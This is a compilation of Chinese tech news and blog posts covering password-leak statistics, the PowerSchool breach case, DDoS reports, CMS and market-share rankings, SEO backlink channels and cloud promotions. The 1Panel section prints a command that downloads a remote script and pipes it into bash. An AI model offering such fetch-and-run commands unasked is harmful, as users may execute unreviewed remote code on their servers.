一、190亿泄露密码数据触目惊心:超9成用户密码形同虚设近日,国际权威网络安全机构Cybernews发布《全球密码安全洞察报告》,通过分析2024年4月以来200起重大数据泄露事件发现:在190亿条泄露密码中,仅有约10亿(5.3%)能抵御字典攻击,超94%的密码存在严重安全隐患,用户账户安全岌岌可危! 二、弱密码特征全解析:这些密码分分钟被破解 典型弱密码TOP榜: "123456"(3.38亿次) "password"(5300万次) "admin"(5300万次) 含"1234"序列密码(7.27亿个) 高危密码六大特征:✓ 纯数字组合(占比47%)✓ 常见英文单词("love"8700万次)✓ 品牌名称("google"2590万次)✓ 影视角色("batman"390万次)✓ 简单替换(如p@ssw0rd)✓ 短于12位字符(8-10位占主流) 三、密码安全三大误区:90%用户都中招!误区1:密码越长越安全? 事实:8字符纯数字密码1秒即破 数据:仅27%密码混合大小写字母+数字 误区2:特殊符号没必要? 现状:仅9%密码包含@#等特殊符号 警示:未加特殊字符的密码被破解率提升300% 误区3:个人信息更安全? 案例:"rome"1300万次、"summer"380万次 风险:姓名+生日组合破解成功率超80% 四、如何设置安全密码?记住这3条黄金法则 长度要求:至少12位起(推荐16位) 复杂度标准:• 必须包含大小写字母• 必须加入数字• 必须使用特殊符号(如@#%^) 管理技巧: 不同平台使用不同密码 每3个月定期更换 使用密码管理器工具 #### 19岁黑客攻破美国教育巨头!7000万师生数据泄露细节曝光 据外媒TechCrunch 5月21日报道,美国马萨诸塞州联邦检方披露重大网络安全案件:19岁学生马修·D·莱恩已认罪,承认入侵全美最大教育科技公司系统,盗取超7000万师生隐私数据,并勒索价值2052万元人民币的加密货币。 本次攻击波及北美及全球多所学校,失窃数据包括: 6000万学生及1000万教师个人信息 敏感资料涵盖社会安全号、病历、学业成绩 部分数据时间跨度长达数十年 检方披露,莱恩与伊利诺伊州同伙通过窃取账号实施攻击,要求支付285万美元(约合人民币2052万元)赎金。尽管未直接点名涉事企业,案件细节与教育科技巨头PowerSchool此前通报的2024年数据泄露事件高度吻合。 值得关注的是,PowerSchool曾于2024年1月承认,其系统在2023年8-9月间遭黑客入侵,涉及管理学生成绩、出勤及健康数据的北美学校系统。该公司虽支付赎金换取数据删除承诺,但今年5月初多个学区再次收到勒索威胁,黑客声称仍持有数据。 PowerSchool发言人贝丝·基布勒回应称,已关注到司法进展,但拒绝对案件置评。此外,检方还指控莱恩曾攻击某美国电信公司,目前案件正在进一步审理中。 #### 1Panel 开源 Linux 服务器运维管理面板 1Panel 是由杭州飞致云信息科技有限公司开发的现代化开源 Linux 服务器运维管理面板,于2023年3月正式上线。其核心特点如下: 核心功能与优势 容器化部署 基于 Docker 技术实现应用隔离,避免环境冲突,支持一键部署 WordPress、Halo 等建站工具,自动完成域名绑定、SSL 证书配置等操作。 全栈管理 提供 Web 图形界面管理:涵盖主机监控、文件管理、数据库(MySQL/Redis等)、容器服务、防火墙配置等,支持实时资源监控与日志审计。 安全与备份 最小化漏洞风险,集成病毒防护、安全审计功能,支持一键备份/恢复数据至云端(如阿里云OSS、AWS S3等),保障数据安全。 应用生态 内置应用商店,精选 Nginx、Jenkins、GitLab 等高质量开源工具,支持快速安装与版本升级。 适用场景 个人开发者:快速搭建博客(WordPress)、企业官网等,无需复杂命令行操作。 企业运维:集中管理多台服务器资源,简化监控、维护流程,降低运维成本。 开发测试:通过容器隔离创建多套独立环境,提升开发效率3。 安装与使用 安装命令:curl -sSL https://get.1panel.io | bash,支持主流 Linux 发行版(如 CentOS、Ubuntu)。 访问方式:安装后通过浏览器访问服务器 IP + 指定端口(默认需配置安全组开放端口)。 对比同类产品相较于宝塔面板,1Panel 界面更现代化,完全免费且专注容器化部署,适合追求轻量、安全与云原生技术的用户。截至2024年10月,其最新版本为 v1.10.20-lts,持续优化应用生态与安全策略。 #### 2 月下旬以来,我国互联网持续遭受境外组织DDOS攻击 3 月 11 日消息,新华社今日报道称,国家互联网应急中心监测发现,2 月下旬以来,我国互联网持续遭受境外网络攻击,境外组织通过攻击控制我境内计算机,进而对俄罗斯、乌克兰、白俄罗斯进行网络攻击。 经过分析得出,这些攻击地址主要来自海外,仅来自美国纽约州的攻击地址就有 10 余个,攻击流量峰值达 36Gbps,87% 的攻击目标是俄罗斯,也有少量攻击地址来自德国、荷兰等国家。 新华社表示,国家互联网应急中心已及时对以上攻击行为最大限度予以处置。 今年 3 月 5 日,有匿名黑客宣布对俄罗斯进行全面的网络战争,此后约有 50 亿次攻击涌向俄罗斯。Atlas 的研究显示,今年 3 月有 70% 的网络攻击是针对俄罗斯的,还有 19% 的攻击是针对乌克兰的,美国是第三大目标(5%)。 在其他发现中,全球 90% 的攻击使用 DDoS 来造成服务中断。银行和其他支付处理公司遭受了全球 72% 的网络攻击。商业部门是 21% 的攻击目标,计算机和 IT 部门遭受了全球 2% 的网络攻击,所有其他行业占 5% 的攻击。 不久前,北京奇安盘古实验室、360 公司接连发布报告,发现隶属于 NSA 的黑客组织,对包括中国在内的全球范围内近 50 个国家和地区进行长达十几年的恶意网络活动,严重危害中国关键基础设施安全、海量个人数据安全以及商业和技术运营。 网络攻击(Cyber Attacks,也称赛博攻击)是指针对计算机信息系统、基础设施、计算机网络或个人计算机设备的,任何类型的进攻动作。 对于计算机和计算机网络来说,破坏、揭露、修改、使软件或服务失去功能、在没有得到授权的情况下偷取或访问任何一计算机的数据,都会被视为计算机和计算机网络中的攻击。 #### 2013 年的网站有 38% 已无法访问 5 月 19 日消息,互联网是现代生活中难以想象的巨大宝库,但即使全世界的用户每天都依赖网络来获取书籍、图片、新闻报道和其他资源,这些内容最终也有可能从人们的视线中消失。皮尤研究中心当地时间 17 日发表的研究发现,当前的在线内容仍然是“稍纵即逝”。 图源 Pixabay 研究人员从 Common Crawl(IT之家注:一项互联网档案服务,定期收集网站在不同时间点的快照)的档案中随机抽样收集了大约 100 万个网页,从 2013 年到 2023 年,每年从 Common Crawl 收录的网页中抽取样本,并检查这些样本在当下是否仍然存在。 数据显示,2013 存在的网页中有 25% 到 2023 年 10 月已无法访问。这些网页无法访问的结果包含两种不同情况:16% 的页面是网页不在域名还在;另外 9% 的页面则是连域名都不在了。 具体来看,在抽样调查的新闻网站中,23% 的网页至少包含一个失效链接,高流量新闻网站和低流量新闻网站网页包含的坏链比例基本相同,网站流量排名前 20% 的新闻网站中,约 25% 的网页至少包含一个失效链接;网站流量排名后 20% 的网站中,数据则是 26%。 百科类网站方面,此次研究人员选择了维基百科的“参考链接”部分。在总共 100 多万个参考链接中,有 11% 已经无法访问;54% 的维基百科网页参考链接至少包含一个失效链接。 社交网站方面,研究人员 2023 年 3 月 8 日至 4 月 27 日期间在社交媒体平台 X(推特)上发布的近 500 万条推文样本,试图每日进行观察,直到 2023 年 6 月 15 日这些推文是否还在网站上。研究发现接近 18% 的推文在 3 个月内就基本不可见。其中六成是因为账号被设为私密、被冻结或注销;四成是因为账号发布者自己删除,但账号本身还活跃。 参考 报告原文 #### 2017年美国风投总额创“.com泡沫”以来最高纪录 腾讯科技讯 据外媒报道, 2017 年是科技行业非常糟糕的一年,曝出了Uber的危机、性骚扰丑闻,以及关于网络中立性的争论。然而,硅谷创业公司并没有受到资金短缺的困扰。 根据PitchBook和美国风投协会(NVCA)的数据, 2017 年美国风投总额创下了自 00 年代初“.com泡沫”破灭以来的最高水平。 8074 笔交易共吸引了 840 亿美元资金。相比之下, 2016 年, 8635 笔交易共吸引了 720 亿美元资金。 尽管投资总额出现上升,但交易数量却出现下降。与 2016 年相比,情况并不是非常明显。但如果看看几年前的情况,那么交易数量的滑坡非常严重。( 2013 年为 9183 笔, 2014 年为 10406 笔, 2015 年为 10463 笔。) 这部分是由于,某些创业公司正等待更长的时间去上市,例如Uber和Airbnb。 PitchBook分析师尼扎尔·塔胡比(Nizar Tarhubi)表示:“从种子轮到独角兽水平,情况都是如此。通常情况下,当前市场中的公司更成熟,因此也能获得更多投资。” 随着投资规模的不断扩大,许多风投公司也在筹集更大的基金。报告称,去年共有 209 只基金完成募资,总额为 320 亿美元。这其中包括IVP的 15 亿美元基金、NEA的 33 亿美元基金,以及 1000 亿美元的软银愿景基金(到目前为止筹资额为 980 亿美元)。 报告还指出:“此外,新手基金经理的筹资额创下 12 年来新高。 35 家这样的基金完成了 33 亿美元的筹资。这表明,基金有限合伙人正在关注新投资人带来的机会。” 在美国风险投资额增加的过程中,美国各地区的投资额自 2013 年以来都出现了大幅增长。传统上风投集中的地区增幅最大。例如,美国西海岸,包括阿拉斯加州、加州、夏威夷州、俄勒冈州和华盛顿州,自 2013 年以来的年风投总额增长了近96%。 大湖地区,包括明尼苏达州、维斯康星州、伊利诺伊州、俄亥俄州、密歇根州和印第安纳州是传统上被忽视的地区,但目前看来前景很好。从 2013 年到 2017 年,这个地区的年风投总额增长了约70%。塔胡比表示,其中大部分增长来自于伊利诺伊州。自 2013 年以来,该州的风投投资额增长了110%。 然而,美国南方并没有从风投快速增长的趋势中受益。自 2013 年以来,当地的年风投投资额下降了近4%。 由于硅谷市面上存在大量资金,因此创业公司没有动力去寻找投资退出渠道,无论是通过收购还是通过IPO(首次公开招股)。报告显示, 2017 年,由风投支持的公司投资退出的数量连续第三年下降,创下自 2011 年以来的最低水平。 2017 年,投资退出笔数为 769 笔,低于 2016 年的 857 笔和 2015 年 1003 笔。 尽管投资退出的数量持续下降,但退出交易的价值基本维持持平。这部分是由于, 2017 年独角兽公司投资退出的数量创纪录,达到 13 家。这其中包括Snap、Stitch Fix、Roku和Blue Apron。(编译/陈桦) #### 2018 20个免费PHP 开源内容管理系统(CMS)推荐 内容管理系统或CMS是一个用于管理新闻的应用程序,用户可以从后台管理系统发布、编辑和删除文章。HTML 和其他脚本语言不需要操作 CMS,尽管使用它们会增加更多优势。 由于我们已经研究了 22 个开放源代码的 PHP 框架,所以我决定对 20 个开源 PHP 内容管理系统进行综述,以便那些没有强大 PH P知识的读者可以用免费且开放的 CMS 源代码轻松创建他们的网站。 01 WordPress WordPress 是一个功能强大且易于使用的内容管理系统。最初它被设计成一个博客平台。然后,它慢慢流行起来,并且可以通过一些技巧和插件定制成强大的 CMS。我写了一篇关于 SEO 插件的文章,也谈到了你应该知道的关于 WordPress 2.8 的东西。 02 Drupal Drupal 是一个用 PHP 写的免费开源的模块化框架和内容管理系统(CMS)。它被用作许多不同类型网站的后台系统,从小型个人博客到大型公司和政治网站。 03 Joomla Joomla 是一个获奖的内容管理系统(CMS),它使您能够建立网站和强大的在线应用。很多方面,包括它的易用性和可扩展性,使Joomla成为最流行的网站的软件。最好的是,Joomla是一个开源的解决方案,是免费提供给大家。 04 Frog CMS 青蛙 CMS 简化了内容管理,提供了优雅的用户界面、灵活的页面模板、简单的用户管理和权限以及文件管理所必需的工具。 05 SilverStripe SilverStrip e是一个用 Sapphire 框架构建的 PHP CMS,采用 MVC 设计模式。你可以从官方网页查看构建 SilverStrip e的示例网站。 06 Mambo Mambo 是一个全功能的,屡获殊荣的,可用于一切从简单网页到复杂的企业应用程序的内容管理系统。虽然有些曼波网站已经迁移到 Joomla,但我想我应该包括曼波因为它仍然是一个伟大的 CMS。 07 TYPOlight TYPOlight 是一个 PHP 5 的 CMS,它有很多功能,如实时更新,跨浏览器的 CS S框架的发电机(IE7 兼容),模板为基础的前端输出,使用 Ajax 和 Web 2 技术。您应该查看主页以获取更多信息。 08 Concrete5 Concrete5 是一个开源的内容管理系统,有着简单的管理员界面。可以使用管理员登录后提供的编辑工具栏来编辑 Web 页面。 09 Textpattern Textpattern 是另一种非常流行的内容管理系统。它需要 PHP 4 去运行大量你可以使用各种自定义的插件。 10 Symphony Symphony 是一种使用 XML / XSLT 作为模板语言的 CMS。Symphony 可以让你定制你喜欢的任何东西,从网站的 URL 结构到发布环境。对于非程序员来说,这个 CMS 可能很复杂。 11 MODx MODx 是一个开源的 PHP 应用框架,可以帮助使用者控制自己的网上内容。它是开发人员和高级用户理想的控制系统,任何人都可以使用 MODx 发布、更新、维护动态网站,或 html 静态页面的网站内容。 12 Habari Project Habari 是专门为现代 Web 开发环境编写的开源博客系统,使用现在面向对象编程技术。 13 CMS Made Simple CMS Made Simple 是一个易于使用的内容管理系统,提供多种模板下载。它的文档完善,方便查看。 14 ImpressCMS ImpressCMS 是一个数据库(MySQL)驱动、模块化的内容管理系统,具有高度可扩展的特点,对于管理社区非常有用。 15 Exponent CMS Exponent 使用直观灵活的内容编辑系统,允许在页面上显示网站页面。你可以在官网下载模板和主题! 16 MiaCMS MiaCMS 是 Mambo CMS 的分支。 它具有强大和可扩展的第三方注册系统,还有灵活的站点主题功能。 MiaCMS 支持 OpenID,有望发展成一个稳定成熟的 CMS。 17 Jojo CMS Jojo 是一个搜索引擎友好型 CMS。除了在文章中提供 SEO 友好的 URL,Jojo 还能解决 www/non-www 问题。Jojo 还可以通过添加数据库、博客、图像库等任何你喜欢的内容来扩展功能。 18 TYPO3 TYPO3 是开源内容管理系统(CMS)和内容管理框架(CMF)。它具有完整的灵活性和可扩展性,同时具有成熟的现成接口,功能和模块。 19 Elxis CMS Elxis CMS 是一个 PHP 开发的内容管理系统,主要特点包括对搜索引擎友好的 URL、安全、可调整的成员列表以及用户资料、自动化任务、设计先进、基于 Ajax 和多语言界面等。 20 Chyrp Chyrp 是一个轻量级博客系统,使用 Twig 作为模板引擎,文档完整,你可以从主站点下载大量有用的模板。 为方便更多开发者交流和学习,欢迎为您认为最好用或者最喜欢的 PHP 开源内容管理系统投上一票,也可以请通过评论来与我们的读者分享使用 PHP 开源内容管理系统的一些经验,谢谢! #### 2018 年「.CN」域名保有量达 2124 万 占全国域名一半以上 7 月 8 日消息:据光明网报道,从中国互联网基础资源大会上了解到,截至 2018 年年底,「.CN」域名的保有量已经达到 2124 万,占我国域名总数的 56%;「。中国」域名保有量达 172 万。 此外,中国互联网络信息中心发布了《2018 年域名行业报告》。文中显示,2018 年中国域名的保有量为 3793 万,虽然市场占有率不断提升,但年增长率下降了 1.4%。 针对中国域名行业发展趋势展望,中国互联网络信息中心主任助理胡安磊分析,用户对域名价值的认识越来越趋于理性,成了域名市场成熟和完善的标志;注重域名注册和应用的合法合规性,成为互联网行业最基本的准入门槛。 #### 2018Chrome浏览器恶意广告拦截功能正式上线 去年Google曾宣布计划内建拦截恶意广告功能,现在正式上线了。 Google 称会根据“更好的广告标准”对各网站的网页样本进行评估,网站会收到被评估通过、警告或失败状态的通知。网站运营者可以通过站长工具(Google Search Console)查看广告体验报告,报告中会详细介绍违反标准的具体行为,也可以对评估结果提请申诉。 为了避免自己网站上的广告被 Google 屏蔽,Forbes、洛杉矶时报、芝加哥论坛报和 InTouch Weekly 等网站都在这个服务上线前修改了网页广告设置。 Chrome激活广告屏蔽功能后,会根据联盟设定的网站、广告黑白名单,判定哪些广告不符合标准(30天无法达到可接受状态),将会被Chrome移除。 在桌面上,Chrome的屏蔽对象包括弹窗广告、带声音的自动播放视频广告、倒计时广告、大面积/全屏广告等等。 而在移动端,弹出广告、带声音的自动播放视频广告、倒计时广告、占用屏幕面积超30%的广告、浮动动态广告、全屏滚动广告等等,也都会被干掉。 Google 表示这 12 类恶意广告都出自 Coalition for Better Ads。这个联盟是一个致力于改善用户在线广告体验的行业组织,由国际贸易协会和很多在线媒体公司联合成立,成员包括 Google、微软、Facebook、华盛顿邮报以及各地广告联盟等机构。 这 12 类恶意广告也被该联盟称作“更好的广告标准”,制定依据来自用户调查。据介绍,共有来自北美和欧洲的 2.5 万名用户,接受了这个联盟关于不同类型在线广告偏好的调查。 虽然 Google 表示拦截这些恶意广告,是为了提升用户体验,但也有人认为 Google 在选择拦截哪些广告类型的过程中,拥有过大的影响力。一位 Coalition for Better Ads 成员称,这个广告标准的建立完全是由 Google 主导的,在减少烦人广告的同时,也会增加 Google 的广告利润。 一些对“更好的广告标准”持反对意见的人表示,为了避免自己投放的广告被屏蔽,广告商可能会选择在 Google 网站或 Google 的其它产品上投放更多的广告。也有人担心这个标准在执行时会有不透明的地方。所以引发了一些广告商的不满。 不过,这项拦截恶意广告的服务上线后,用户就可以不用再去下载第三方插件来拦截广告了,Google 也省下一笔为了进入这些插件白名单所产生的费用。 #### 2018世界搜索引擎排名 2018年7月,搜索引擎市场占有率排行榜(国内) 2018年7月,百度国内市场份额为73.84%,排名第一(即最大); 神马第二,市场份额为15.00%;(全靠UC浏览器占有率) 360搜索第三,市场份额为4.13%; 搜狗搜索第四,市场份额为3.89%; Google第五,市场份额为1.69%; 必应第六,市场份额为1.05%; 其他搜索引擎的市场份额合计为0.40%。 数据来源:StatCounter Global Stats – Search Engine Market Share 2018年7月,国内搜索引擎的PC端市场份额(Platform:Desktop): 百度 72.37%; 360搜索 11.49%; Google 6.06%; 搜狗搜索 4.11%; 必应 3.94%…… 2018年7月,国内搜索引擎的移动端市场份额(Platform:Mobile+Tablet): 百度 74.24%; 神马 18.84%; 搜狗搜索 3.84%; 360搜索 2.15%; Google 0.52%…… 2018年7月,全球搜索引擎市场占有率排行榜 2018年7月,Google全球市场份额为90.48%,排名第一(即最大); Bing第二,市场份额为3.10%; Yahoo!第四,市场份额为从2.21%; 百度第三,市场份额为1.95%; Yandex第五,市场份额0.84%; 其他搜索引擎的市场份额合计为1.42%。 #### 2018中国搜索引擎排行 百度、360、搜狗、神马搜索份额多少? 最近有网友问了小编一个比较有意思的问题:2018年百度、360、搜狗、神马搜索份额多少?自从谷歌搜索退出中国之后,百度一直是国内搜索引擎的绝对老大,牢牢占据中国搜索引擎市场份额第一。由于占比比较固定,小编这几年也很少去关注中国各大搜索引擎份额,今天既然网友问到了这个,小编也突然感兴趣起来了,通过查询了一些资料,大致了解了2018年中国各大主流搜索引擎份额排名,仅供参考。 2018中国搜索引擎排名 目前,中国搜索引擎公司主要包括百度、360搜索、神马搜索、搜狗搜索等,国外还在国内有运营的主要是谷歌(香港)、微软必应,其它还有一些市场份额很少,基本可以忽略。此外,如今搜索引擎又分为PC(电脑)端、移动(手机)端,下面本文也分开罗列,最后再附上一个综合搜索引擎排名。 2018年PC端搜索引擎市场份额排名: 百度:58.67%; 360搜索:25.88%; 谷歌:5.26%; 搜狗搜索 4.42%; 必应:4.28%…… 由于神马搜索只做移动端,因此在PC端没有份额。 2018年移动端搜索引擎市场份额排名: 百度:78.05%; 神马:14.61%; 搜狗搜索:4.47%; 360搜索:1.60%; 谷歌:0.70%…… 2018年中国搜索引擎综合(PC+手机)市场份额排名: 百度:73.02%; 神马搜索:10.90%; 360搜索:7.90%; 搜狗:4.46%; 谷歌:1.89%; 必应:1.37%; 其它:0.46% 以上2018中国搜索引擎排名,数据截止至三月底,数据仅供参考,过往数据,不代表将来数据。只不过,中国的搜索引擎份额都比较固定,波动比较小。 从数据来看,百度是中国搜索引擎的绝对老大哥,无论是PC还是移动端,都遥遥领先其它搜索引擎,综合占比超73%,移动端更是高达78%。自从谷歌退出中国市场之后,大部分搜索引擎份额都转移到了百度身上,几乎垄断了国内搜索引擎市场。 百度 值得一提的是,360搜索虽然在PC市场有着近25%的市场份额,但移动端搜索份额非常尴尬,份额极低,远不如百度,甚至是相比神马、搜索、谷歌都有明显差距,移动端存在明显短板,综合占比也仅有不到8%,这个成绩还不如神马的综合成绩。 360搜索 神马搜索由于只做移动端搜索引起,属于移动端第二代搜索引擎,市场份额为14%左右,不过没有PC端,综合占比10.9%,也不高。 搜狗则PC和移动端占比较为均衡,但份额都不高,整体中规中矩吧。谷歌搜索曾经在中国市场占比在30%-40%之间,但由于退出中国大陆市场,目前只有香港提供服务,大陆不少地区由于被屏蔽,无法访问,因此中国市场份额占比比较低。 2018全球搜索引擎排名 最后补充一句,虽然百度是中国搜索的绝对老大,不过在全球搜索引擎市场,百度份额只有约1.50%,全球市场份额很低,谷歌则高达91.25%,是全球搜索引擎绝对老大。排名第二的是Bing,全球搜索引擎市场份额约为3.06%。 #### 2018云服务市场份额报告:阿里云第一腾讯云第二百度云影子都没见到 IDC在今年7月份发布的《中国公有云服务市场半年度跟踪报告》显示,阿里云市场占有率超过45%,腾讯云10%。一个重要的细节,排名前五的云服务商中,除了运营商系的中国电信,其它的都是互联网系云服务商。 这份报告表格中显示,位居老大和老二的分别是阿里云和腾讯云,阿里云市场份额占45.5%,排名第一营收11.12亿美元,腾讯云市场份额10.3%,排名第二营收2.51亿美元,中国电信老三,份额7.6%,营收1.85亿美元(IDC中国数据)。其它市场份额就相对靠后了。 公有云市场的竞争是快速而残酷的,其马太效应也更加愈发凸显。在国内公有云厂商2017年增长幅度中,阿里云年增长率达到152.33%,市场份额上遥遥领先,强者越强;腾讯云紧随其后,年增长幅度136.76%,综合排名第二。 目前,国内主要以阿里云、腾讯云、金山云为代表的互联网系云服务商地位也愈发牢固。 百度云作为老牌互联网公司居然连前十都进不到,确实有待改进。 #### 2018年 .org后缀域名将无法备案了 可以备案的域名有哪些 根据工信部的要求,关于互联网域名注册管理机构审批情况的公示(截至2018年01月),.ORG 域名无法备案。 由《可备案域名公告》可知,目前工信部可接受备案域名后缀: 英文域名:.cn/.ren/.wang/.citic/.top/.sohu/.xin/.com/.net/.xyz/.vip/.work/.law/.beer/.club/.shop/.site/.ink/.info/.mobi/.red/.pro/.kim/.ltd/.group/.auto/.link/.biz/.fun/.online/.store/.tech/.art/.design/.wiki/.love/.center/.video/.social/.team/.show/.cool/.zone/.world/.today/.city/.chat/.company/.live/.fund/.gold/.plus/.guru/.run/.pub/.email/.life 中文域名:.中国/.公司/.网络/.政务/.公益/.政务.CN/.公益.CN/.网址/.商城/.网店/.中信/.商标/.信息/.广东/.佛山/.集团/.我爱你/.网店/.手机/.购物/.在线/.中文网/.游戏/.企业/.娱乐/.商店/.餐厅/.招聘 除以上域名,其他域名后缀均无法在工信部进行备案。可以看到,上面并没有ORG后缀的域名了,此外,从2018年1月1日起,工信部要求备案域名必须完成域名实名认证了。 目前,国家规定网站域名执行实名认证了,网络安全加强了,简化网站主机备案程序;不过这几年,因为备案,我国从事网络的人员因为照相,换主机需要重新转入备案等手续导致国内人购买美、韩等主机,过于繁琐太不划算了。主机吧建议大家选一个稳定的服务商,以免长期更换空间导致浪费时间。 #### 2018年3月2日GitHub 遭受了史上最严重的DDOS攻击 2018年3月2日,美国东部时间晚上 12:15,峰值1.35TB/秒的流量冲击了开发者平台 GitHub。这是迄今为止有记录的最大一次 DDoS 攻击。 GitHub 受到攻击后,服务器断断续续,无法访问。攻击发生 10 分钟后,GitHub 向 CDN 服务商 Akamai 请求协助,访问 GitHub 的流量已经由后者接管。 Akamai服务商的副总裁表示「我们是基于迄今为止最大规模 DDoS 攻击五倍的峰值而建模,所以 1.3T 对我们来说是小意思,当然有信心是一回事,实战能不能发挥作用又是另一回事了」。 Akamai 用多种方式防御这次攻击。除了通用 DDoS 防御基础架构之外,该公司最近还针对源自 memcached 服务器的 DDoS 攻击实施了特定的缓解措施。 这并不是 GitHub 第一次 被DDoS,在 2015 年 3 月被 DDoS 了六天。2015 年那次攻击让人印象很深,僵尸物联网让 DDoS 攻击力增强了一个等级。 网络监测和舆情分析公司 ThousandEyes 对昨天的攻击表示「这次防御做的很出色,一切都在 15 - 20 分钟内完成。如果看一下统计数据,就会发现,单独的 DDoS 攻击检测通常都要一个小时,而这次 20 分钟内搞定,这是软件驱动的,是一次非常成功的案例」。 Akamai 怀疑攻击者仅仅是因为 GitHub 很高端,知名度很高,所以锁定了 GitHub 作为目标。而防御措施太快,持续时间相当短,可能还没来的及要赎金,一切就结束了。 #### 2018年8月,国内&全球浏览器排行榜 做站长的经常使用到浏览器,每天访问网页上百次,所以一个好的浏览器对站长非常重要, 这里我们关注下全球浏览器排行,排名越高说明这个浏览器越优秀,速度越快,越稳定。以主机吧为例,之前使用国产浏览器,网页一但访问多了,就会出现顿卡。甚至死机,而现在换了Mozilla后,速度超快,还不卡。2018年8月,全球PC浏览器市场份额排行榜▼第1名:Google的Chrome浏览器,其全球市场份额为67.63%;第2名:Mozilla Firefox,其市场份额为10.97%;第3名:微软的IE浏览器,其市场份额为7.02%;第4名:苹果的Safari浏览器,其市场份额为5.13%;第5名:微软的Edge浏览器,其市场份额为4.24%;第6名:Opera浏览器,其市场份额为2.48%;其他浏览器的市场份额合计为2.52%。数据来源:StatCounter-Desktop Browsers2018年8月,国内PC浏览器市场份额排行榜▼Google的Chrome浏览器排名第一,其市场份额为47.07%;微软的IE浏览器排名第二,其份额为19.14%;(其中,IE9的份额为7.95%,IE11的份额为5.83%,IE8的份额为5.36%)2345加速浏览器排名第四,其份额为6.19%;QQ浏览器排名第三,其份额为5.97%;搜狗高速浏览器排名第五,其份额为4.77%;火狐浏览器、苹果的Safari浏览器排名第六,份额均为2.44%;其他浏览器的市场份额合计为11.97%。说明:此榜单中没有360安全浏览器和360极速浏览器,因为其去掉了原本的浏览器特征(User-Agent)而表现为IE、Chrome等浏览器特征。本文中的市场份额是指使用不同浏览器的网民带来的浏览量占比,数据来源于百度统计所覆盖的超过150万的站点。2018年7月,手机浏览器月度独立设备数(万) 浏览器名称 月度独立设备数(万) 评分 评价人数 QQ浏览器 41402 3.9 11514 UC浏览器 30607 4.1 30341 360浏览器 11443 3.3 1007 百度浏览器 6506 4.6 3236 搜狗浏览器 4444 3.6 3713 猎豹浏览器 2971 4.7 4980 Chrome浏览器 1653 5 52024 2345浏览器 1004 3.7 898 欧朋浏览器 760 4.5 90 绿茶浏览器 692 3.9 531 说明:月度独立设备数来自艾瑞数据,评分和评价人数来自魅族应用商店。 #### 2018年中国CDN市场份额排行:网宿、阿里云、腾讯云排前三 从上图我们可以看到,2018年网宿依然是国内CDN老大,但增涨已经非常慢了,分别上榜的有网宿科技、阿里云、腾讯云、百度云、白山云(原蓝汛团队)、金山云、蓝汛。 其中又以百度云增长最为猛烈,经过这几年的发力,百度云已经稳定居国内云服务前5行列,去年CDN增长率高达188.1%,是所有服务商中增长最快的,怪不得今年百度把智能云业务提升为战略发展地位,虽然百度云比阿里云成立整整迟了几年,但像百度这种本来就有技术基因的公司,搞云服务真的特别容易,未来前三还是有希望的,主机吧非常看好。 而蓝汛最惨,负增长,份额直掉40%,据传是原团队分家白山云带走原来的业务,导致暴跌。估计用不了多久前十都进不了,真是风云变换呀。 #### 2018年最全的网站外链建设渠道分享 1,搜狐自媒体 搜狐自媒体是非常好用的外链平台,这个平台的特点是审核快,收录快,排名好。但是怎么说这个也是搜狐的平台,如果外链太过密集也是有通过不了的可能。 2,问答类 问答类的平台留的链接效果是非常好的,不过前提是能留的下。目前来说百度知道这块已经非常严格了,想要留链接已经非常难了。不过可以考虑360,爱问知识人、搜搜问问、天涯问答、等一些其他的问答类。 3,百度贴吧 虽然说百度知道在近几年留链接非常的困难了,但是百度贴吧留链接还是有可能的,找对了贴吧就可以留,不过也有被删的几率。 4,新浪博客 新浪博客是目前为止免费博客里面唯一留描文本能够传递权重的博客了,所以新浪博客是做外链必不可少的一个平台。 5,各大平台投稿 本来我以为这个方法对我来说会是最难的,因为我写不出来什么好的东西,但是当我写了一些文章投稿试了试之后,很多网站也给我通过了,我才知道他们也没那么严格。 6,各大站长论坛社区 做SEO这块的越来越喜欢交流了,所以如果当我们请求别人分析网站的时候,也可以把自己的链接留下来。 7,论坛个性签名 现在论坛这块的链接一般不怎么传递权重啦,但是还是可以吸引蜘蛛的。 总结一下,以上只是我汇总的部分外链平台,陪伴不可能将所有的外链平台都写出来,如果你有更好的欢迎与陪伴SEO交流,谢谢。 #### 2018年电商占有率报告:淘宝、拼多多、京东排名前三 12月26日 消息:今日,极光大数据发布《2018年电商行业研究报告》,结合电商大数据以及电商用户调研数据,从行业运营情况、用户评价、用户粘性、用户价值、双十一情况、用户画像等多个方面综合分析电商行业的情况。 据报告显示,移动购物行业用户规模增长 2 亿至7. 83 亿,渗透率增长超过10%。其中淘宝、拼多多、京东APP2017.11~2018.11的渗透率分别为52.5%、27.4%、23.9%,位列前三。 此外,“用户对主要电商平台的净推荐值”方面,京东、手机淘宝、天猫排名前三。 #### 2018年百度云加速双11活动 尊敬各位站长:又到了一年一度的双11活动啦!本次活动主要优惠有两个:1. 代理商开通的所有年付费套餐将额外赠送3个月服务!不管是续费还是新购!买一年送3个月,买二年送6个月,多买多送!2.所有流量包全场5折优惠!活动时间11.1-11.16,赠送时长在月底前统一加上。百度云加速是百度旗下为网站提供一站式加速、安全防护和搜索引擎优化的产品。百度云加速是市场占有率最高的云加速产品之一,正为数十万用户的近百万网站提供CDN、网络安全和SEO服务。每天处理十亿级的PV流量及数百亿TB的数据流量,并提供市场顶尖水平的稳定性和抗攻击能力。有需要的可以联系主机吧购买,欲购从速!相关链接 #### 2018年百度云双11购物节优惠活动 相信不少网友都渴望得到锦鲤 万千宠爱于一身 瞬间过上了神仙般的生活 就在传统的1024程序员节日 百度云要怎么搞事情啊 会不会有超豪华的礼物 打折的力度会不会很大 优惠券也好想要啊 要是有很多优惠可以选择就更好了 别担心这些统统不是问题 你的心愿百度云全都能实现 免费抽大奖,100%中奖奖品有iPhone XS、Apple Watch、爱奇艺电视果、爱国者移动硬盘(1TB)、盯盯拍行车记录仪M6C、翻转式护眼灯、小度在家、代金券礼包。  备注:活动期间,完成实名认证获得1次抽奖,成功购买活动产品后再获得1次抽奖。 限量云产品秒杀低至1折BCC云服务器低至88元/年BCH云虚拟主机低至11元/年CDN流量包低至9.9元/6个月BOS存储包低至8元/6个月 免费送6500元代金券放肆新购,无忧续费,普惠上云买买买!!!   五大会场全线爆款产品狂欢促销建站专场、云服务器专场、CDN流量包+BOS存储包专场、数据库专场、云市场专场,多个分会场满足各类业务需求,时长全覆盖,更有组合套餐价超值购! 就准备发消息的时候 我们又偷偷打听到 重大信息 活动期间还有惊喜彩蛋送出 具体是什么惊喜 还请持续关注百度云官网 这次  我们不预售 只来真的 详细规则以及具体价格见官网 还等什么 一年一次就等你啦 